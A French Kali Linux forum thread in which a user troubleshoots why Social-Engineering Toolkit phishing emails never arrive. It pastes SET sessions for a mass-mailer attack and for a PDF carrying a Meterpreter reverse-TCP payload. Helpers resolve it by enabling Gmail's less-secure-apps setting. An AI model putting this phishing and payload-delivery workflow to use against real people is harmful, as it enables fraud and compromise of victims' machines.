Auteur Sujet: SET has finished sending the emails >> mais rien n'arrive dans mes boites mail  (Lu 7474 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
bonjour,
Je déroule SET sans probleme mais je ne retrouve rien dans mes boites mails ( toutes les boites mails sont perso).
J'ai pas de messages d'erreur.
1) Social-Engineering Attacks
5) Mass Mailer Attack
2.  E-Mail Attack Mass Mailer
mon .txt de liste email est déja sur mon bureau
set:phishing> Path to the file to import into SET:/root/Bureau/EmailText.txt
1. Use a gmail Account for your email attack.
set:phishing>1
set:phishing> Your gmail email address: xxxxx@gmail.com
set:phishing> The FROM NAME the user will see:XXX
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:y
set:phishing> Email subject:sujet : exemple sujet
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:h
[!] IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.
set:phishing> Enter the body of the message, type END (capitals) when finished: 12345   
Next line of the body: END

    Sent e-mail number: 1 to address: ddddd@neuf.fr
    Sent e-mail number: 2 to address: eeeee@virginbox.fr


    SET has finished sending the emails

De quoi ça peut venir ,
Merci de votre aide

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Tu as vérifier les junkmail ?
pour gmail n'oublie pas d'utiliser le port 587

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
Bonjour,

Pas de "junk" en vue.

Je pense que ça vient de send email, par défaut ll est en local host.
Citer
J'ai tenté ceci :
root@xxx:~# sendemail -f 123@xxx.fr -t aaa@virginbox.fr -m corpus message -xu gggg@gmail.com -xp Wxkug
Oct 31 10:49:19 xxx sendemail[1878]: ERROR => Connection attempt to localhost:25 failed: IO::Socket::INET6: connect: Connexion refusée

J'ai ensuite été voir la config :
Citer
root@xxx:~# leafpad /usr/bin/sendEmail
 ## Network
    "server"               => 'localhost',                         ## Default SMTP server
    "port"                 => 25,                                  ## Default port
    "bindaddr"             => '',                                  ## Default local bind address
    "alarm"                => '',                                  ## Default timeout for connects and reads, this gets set from ...

Mes liens :
http://www.coyotus.com/viewtopic.php?id=356
https://timw3b.wordpress.com/2013/07/06/sendemail-sous-kali-linux/

Ton tuto (en lien)
Citer
..l'application (SendEmail en l'occurence) qui souhaite envoyer un email aura toujours besoin de l'adresse d'un (premier) serveur Smtp, en distant (remote) ou en local (localhost).
Pourquoi Set  m'indique alors :
Citer
..
SET has finished sending the emails
Ca devrait être également refusé ?
Pour entrer ce premier serveur smtp, je suppose qu' il faut le faire en ligne de commande pour pouvoir le changer si besoin ?

merci encore






Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Tu es sensé utiliser ton adresse gmail comme adresse d'envois

1. Use a gmail Account for your email attack.
set:phishing>1
set:phishing> Your gmail email address: xxxxx@gmail.com
set:phishing> The FROM NAME the user will see:XXX
Email password:

Donc pour sendemail l'option -s smtp.gmail.com avec le port 587 => https://support.google.com/a/answer/176600?hl=fr

Sans oublier -xu USERNAME et -xp ton mot de passe gmail

Au fait le -xu c'est sans le @gmail.com

Edit: je viens de tester chez moi, ça fonctionne nickel.

« Modifié: 31 octobre 2015 à 14:20:57 par coyotus »

Hors ligne Checkfx

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 401
  • +28/-3
  • ! Bazinga
    • Kali Québec
Citer
Donc pour sendemail l'option -s smtp.gmail.com avec le port 587

Je ne sais pas si SET le prendra en compte parce que du mass mail j'en fait jamais mais ....

smtp.gmail.com:587

Peut être la bonne syntaxe a utiliser ... les clients mail normalement qui ne veulent pas fonctionner avec la configuration ou on indique 587 dans un input, permettent d'inscrire le nom du smtp de cette facon !

P-ê aussi vérifier si ruby est a jour !

Pour avoir très longtemps fait du support internet chez un FAI .... si tes adresse ont cette syntaxe :

Citer
    Sent e-mail number: 1 to address: ddddd@neuf.fr
    Sent e-mail number: 2 to address: eeeee@virginbox.fr

spam assasin va juste carrément les deleter/bloquer au passage  ! Trop un look de spam comme adresse ...essaie avec des adresse plus normal !
« Modifié: 31 octobre 2015 à 15:27:57 par Checkfx »

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Je pense que dddd et eeeee sont là pour masquer la vraie adresse de destination.

Hors ligne Checkfx

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 401
  • +28/-3
  • ! Bazinga
    • Kali Québec
Très plausible mais si c'est pas le cas faut pas chercher pkoi ils ne passe pas !  ;)

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Très plausible mais si c'est pas le cas faut pas chercher pkoi ils ne passe pas !  ;)

Déjà parce qu'il à lis @gmail.com à -xu alors qu'il ne fait pas.

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
Bonsoir

effectivement mes adresses ddd@.. 123@.. sont masquées.

J'ai suivi avec précision ce qui marche chez Coyotus et chez moi c'est encore Niet...

Je dois avoir un autre probleme :
Citer
root@xxx:~# sendemail -f 123@gmail.com -u sujet du message -t aaa@virginbox.fr -m corpus body -o tls=yes -s smtp.gmail.com:587 -xu 123 -xp .....
Oct 31 18:15:26 cash sendemail[2969]: ERROR => ERROR => SMTP-AUTH: Authentication to smtp.gmail.com:587 failed.
root@Cash:~#

J'ai essayé aussi en rajoutant -o tls=yes .... ça change rien.

Je comprends pas ?
Citer
Déjà parce qu'il à lis @gmail.com à -xu alors qu'il ne fait pas.
J'ai enlevé le "@gmail" a -xu
-xu 123@gmail.com

J'ai tout rererevérifié, adresses mail, login, Mdp, et tout est Ok.

Je vais remettre le couvert ce soir.
 




Hors ligne Checkfx

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 401
  • +28/-3
  • ! Bazinga
    • Kali Québec
ok installe : Gufw

Qui te donnera une gui pour jouer dans ufw ... désactive le complètement le temps de ton test ... si ca passe ... on aura la réponse pkoi ca sort pas !

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
Bonjour,

j'ai installé gufw et j'ai bien mon gui et suis en "pare feu désactivé" + fait un update et upgrade en terminal + revérifier ifconfig.

Citer
.. si ca passe ... on aura la réponse pkoi ca sort pas !
oui, mais ça passe pas.. Comme il est désactivé j'ai pas accés aux journaux.

Mes tests
J'ai relançé SET avec un file format exploit pour voir si je me connectais à gmail et ce qui en sortait:
Citer
1) Spear-Phishing Attack Vectors
1) Perform a Mass Email Attack
12) Adobe PDF Embedded EXE Social Engineering
1. Use your own PDF for attack
set:payloads> Enter path to your pdf [blank-builtin]:/root/Bureau/Untitled1.pdf
5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
set> IP address for the payload listener (LHOST): 192.168.1.39
set:payloads> Port to connect back on [443]:                        ## je le laisse par defaut a 443
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
  • Waiting for payload generation to complete...

...................
  • Waiting for payload generation to complete...
  • Payload creation complete.
  • All payloads get sent to the template.pdf directory
  • [-] As an added bonus, use the file-format creator in SET to create your attachment.
    1. Keep the filename, I don't care.
    1.  E-Mail Attack Single Email Address
    2. One-Time Use Email Template
    set:phishing> Subject of the email: sujet test
    set:phishing> Send the message as html or plain? 'h' or 'p'
[p]:h
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished: body test
Next line of the body: ^Cset:phishing> Send email to:aaaaa@virginbox.fr
1. Use a gmail Account for your email attack.
set:phishing> Your gmail email address:12345@gmail.com
set:phishing> The FROM NAME user will see:test gmail
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:yes

Résultat
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.

Press {return} to view error message
(534, '5.7.14 <https://accounts.google.com/ContinueSignIn?sarp=1&scc=1&plt=AKgnsbuY3\n5.7.14 OfQPHTuZbFh4ciiQr8_B1XN5BfKAIQFXgJ7geFn-1sxMxuOszsDZvCY9df2njF7ZE1jb64\n5.7.14 IA6elSnqj8DNUTLv0aJAqC7R1UKREi7dbHtBiPwEvGXRCv4DFiYQBggiui3mD81GjsuKEh\n5.7.14 _IEipVjgya1YPb3gfnOL8m70fINO0Z6KKG5AWRm7la4QPGZIiLkROAzfhIxxhcI7rKoBtV\n5.7.14 H4ETBX2SJw-Zt6rdad8qfb-eMckE> Please log in via your web browser and\n5.7.14 then try again.\n5.7.14  Learn more at\n5.7.14  https://support.google.com/mail/answer/78754 ly4sm17031797wjb.4 - gsmtp')
  • SET has finished delivering the emails

set:phishing> Setup a listener [yes|no]:....

Même si j'ai un probleme "Unable to deliver email...", je me suis bien connecté à gmail, puisque le lien https://support.google.com/mail/answer/78754 m'enmène directement sur le centre d'aide gmail, je me trompe ?

En même temps si je recommence sendemail avec les mêmes données email, passord, j'ai toujours le même résultat :
Citer
sendemail -f j12345@gmail.com -u sujet du message -t aaaal@virginbox.fr -m corpus body -o tls=yes -s smtp.gmail.com:587 -xu 12345@gmail.com -xp W.....
Résultat  ( toujours le même):
Nov 01 14:31:09 cash sendemail[4726]: ERROR => ERROR => SMTP-AUTH: Authentication to smtp.gmail.com:587 failed.
Pour lever un doute, j'ouvre bien toutes mes boites mails directement avec iceweasel

Voila le détail (je ne sais pas en tirer profit en terme d'analyse)
Lien : http://helllinux.blogspot.fr/
Citer
root@Cash:~# sendemail -vvv -f 12345@gmail.com -u sujet du message -t aaaa@virginbox.fr -m corpus body -o tls=auto -s smtp.gmail.com:587 -xu 12345@gmail.com -xp Wxxxxx..
Nov 01 16:01:10 cash sendemail[6001]: DEBUG => Assigned $opt{} key/value: tls => auto
Nov 01 16:01:10 cash sendemail[6001]: DEBUG => Connecting to smtp.gmail.com:587
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => My IP address is: 192.168.1.39
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 220 smtp.gmail.com ESMTP q204sm13186283wmg.4 - gsmtp
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 220
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    220 smtp.gmail.com ESMTP q204sm13186283wmg.4 - gsmtp
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    EHLO cash
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 250-smtp.gmail.com at your service, [77.205.134.113], 250-SIZE 35882577, 250-8BITMIME, 250-STARTTLS, 250-ENHANCEDSTATUSCODES, 250-PIPELINING, 250-CHUNKING, 250 SMTPUTF8
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 250
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    250-smtp.gmail.com at your service, [77.205... mon  ip], 250-SIZE 35882577, 250-8BITMIME, 250-STARTTLS, 250-ENHANCEDSTATUSCODES, 250-PIPELINING, 250-CHUNKING, 250 SMTPUTF8
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => The remote SMTP server supports TLS :)
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => Starting TLS
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    STARTTLS
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 220 2.0.0 Ready to start TLS
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 220
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    220 2.0.0 Ready to start TLS
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => TLS: Using cipher: ECDHE-RSA-AES128-SHA
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => TLS session initialized :)
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    EHLO cash
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 250-smtp.gmail.com at your service, [77.205.134.113], 250-SIZE 35882577, 250-8BITMIME, 250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH, 250-ENHANCEDSTATUSCODES, 250-PIPELINING, 250-CHUNKING, 250 SMTPUTF8
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 250
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    250-smtp.gmail.com at your service, [77.205...mon ip], 250-SIZE 35882577, 250-8BITMIME, 250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH, 250-ENHANCEDSTATUSCODES, 250-PIPELINING, 250-CHUNKING, 250 SMTPUTF8
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => SMTP-AUTH: Using LOGIN authentication method
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    AUTH LOGIN
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 334 VXNlcm5hbWU6
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 334
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    334 VXNlcm5hbWU6
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx20=
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 334 UGFzc3dvcmQ6
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP success code: 334
Nov 01 16:01:11 cash sendemail[6001]: SUCCESS => Received:    334 UGFzc3dvcmQ6
Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    Vxxxxxxxxxxxxxxxxxxxxxxxxtz
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Checking for SMTP success or error status in the message: 534-5.7.14 <https://accounts.google.com/ContinueSignIn?sarp=1&scc=1&plt=AKgnsbvkA, 534-5.7.14 lqFEwc2aa5B2d_E7EK3BhSvp-UusH---Y0pTkelC0XWeNbHTApuNX4X6YH6MpLWWbog646, 534-5.7.14 PN_IKwL6pfTodWy9nysMvahl3Q41fL9x_sKsC7peFlxpZiekKdskYVL-41LcJ2Vw_rmEwD, 534-5.7.14 Hg6Ceoke2ElTbC4EEFo9ltGF-ACertsmwABsmJ5YOhths3vyDfyPf-Dmgo0dX-SmLIVL7R, 534-5.7.14 o7v_idAhjSJSOkZlkyXTPyoh9OeE> Please log in via your web browser and, 534-5.7.14 then try again., 534-5.7.14  Learn more at, 534 5.7.14  https://support.google.com/mail/answer/78754 q204sm13186283wmg.4 - gsmtp
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => evalSMTPresponse() - Found SMTP error code: 534
Nov 01 16:01:11 cash sendemail[6001]: DEBUG => SMTP-AUTH: LOGIN authenticaion failed.
Nov 01 16:01:11 cash sendemail[6001]: ERROR => ERROR => SMTP-AUTH: Authentication to smtp.gmail.com:587 failed.
root@Cash:~#

j'espére que ça peut aider pour m'aider  ..??
et si ça, sa peut aider quelqu'un sur sendemail : https://github.com/mogaal/sendemail






« Modifié: 02 novembre 2015 à 16:59:16 par mixel »

Hors ligne WarLocG

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 477
  • +70/-0
  • Spé Code Python Java Bash
Juste pour t'informer que ton message de debug contient ton adresse gmail que tu avais "masqué", c'est du simple base64 donc ca se déchiffre facilement. Tu devrais éditer ces parties également dans ton poste pour éviter de ramasser du spam.

Ceci Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    am***************************20= contient ton adresse gmail.com que tu tentais de masquer.
Et édite cette ligne la aussi =>  Nov 01 16:01:11 cash sendemail[6001]: INFO => Sending:    V*********z
PS: J'ai édité le message pour t'éviter des problèmes mais tu devrais en faire autant.

Je te recommandes aussi de changer ton pass avant que des petits malins ne le fasses pour toi également, tu as donné trop d'info dans ton message.

Pour ton erreur 534 5.7.14, tu a quelques éléments de réponses ici => http://www.scriptscoop.com/t/0a9a4e3fe171/email-how-to-fix-send-mail-authorization-failed-534-5-7-14.html

Citer
Go to your Google Account settings, find Security -> Account permissions -> Access for less secure apps, enable this option.

About this option: https://support.google.com/accounts/answer/6010255
« Modifié: 01 novembre 2015 à 18:45:00 par WarLocG »
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
Bonjour WarLOcG,

merci de ton intervention et de ton honnetteté, j'ai appris qqchose d'important  aujourd'hui.
J'ai changé le Mdp ce cette boite gmail.
Les boites mails avec lesquelles je fais mes test sont uniquement destinées à ceux-ci.

Concernant le contenu du lien que tu m'as indiqué, j'ai remarqué ceci "On port 587 use UseTLS, with port 25 use UseSTARTTLS"
et dans le debug j'ai :
Nov 02 13:31:34 cash sendemail[1506]: INFO => Sending:    STARTTLS
c'est pas ça l'erreur, étant en 587 ?

Ma connexion gmail est Ok puisque dans ma boite gmail j'ai ceci :
Un utilisateur a essayé de se connecter à votre compte Google (12345@gmail.com) depuis une application qui ne respecte pas les normes de sécurité les plus récentes.
sinon je n'aurai pas ce retour ?

comment, si c'est ça, je peux solutionner ?




Hors ligne WarLocG

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 477
  • +70/-0
  • Spé Code Python Java Bash
Bonjour,

Depuis ton compte gmail, as-tu activé l'option pour permettre les applications non sécurisées ? (voir le quote dans mon message précédent)
Citer
Go to your Google Account settings, find Security -> Account permissions -> Access for less secure apps, enable this option.
D'après le message que tu recois dans gmail "Un utilisateur a essayé de se connecter à votre compte Google (12345@gmail.com) depuis une application qui ne respecte pas les normes de sécurité les plus récentes.", je pense que non.

Egalement, je vois que tu n'a toujours pas modifié ton précédent message. Même si tu as changé ton mot de passe, ne donne pas l'opportunité aux spammeurs en leur refilant tout chaud ton adresse.

Bien à toi.
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne mixel
  • Membre Junior
  • *
  • Messages: 21
  • +1/-1
Ça y est, j'ai fait la modification de mon message..

Je viens de suivre ton conseil et CA MARCHE !!! :D
Citer
Nov 02 17:49:47 cash sendemail[2254]: Email was sent successfully!
je retrouve bien le mail dans l'envoi de ma gmail.

Si je comprends, mais tu me corrigeras, un Sendemail ne peut alors être valide que si un  compte gmail n'est pas paramétré pour des applications non sécurisées.
Pourtant, je pense que la plupart des utilisateurs gmail restent avec un paramétrage par défaut avec "applications sécurisées" ( enfin je suppose ?),parce qu'il faut quand même connaître la "manip" pour changer cette config.

Je vais essayer avec un envoi à partir de mon FAI, de yahoo.
J'ai essayé entre 2 gmail et ça marche impeccablement, le gmail "envoi" avec le paramétrage "appli non sécurisée" vers un gmail "appli sécurisée".

Mais alors, qu'est ce qui fait la différence entre une application sécurisée et non sécurisée ?
A partir de quoi Google filtre cette différence ?
Et dans le cas "applications sécurisée", comment (si c'est possible ?), utiliser sendemail pour être considéré comme une application sécurisée ?

Juste pour info, je vais installer un Vpn (certainement NordVpn), d'après ce que crois comprendre, ça ne devrait rien changer pour gmail, le principe reste le même ?
Mais cela fera ultérieurement l'objet d'un autre message sur le forum, chaque chose en son temps, c'était juste pour savoir globalement.

Vraiment sincèrement, merci mille fois ;)
« Modifié: 02 novembre 2015 à 18:26:49 par mixel »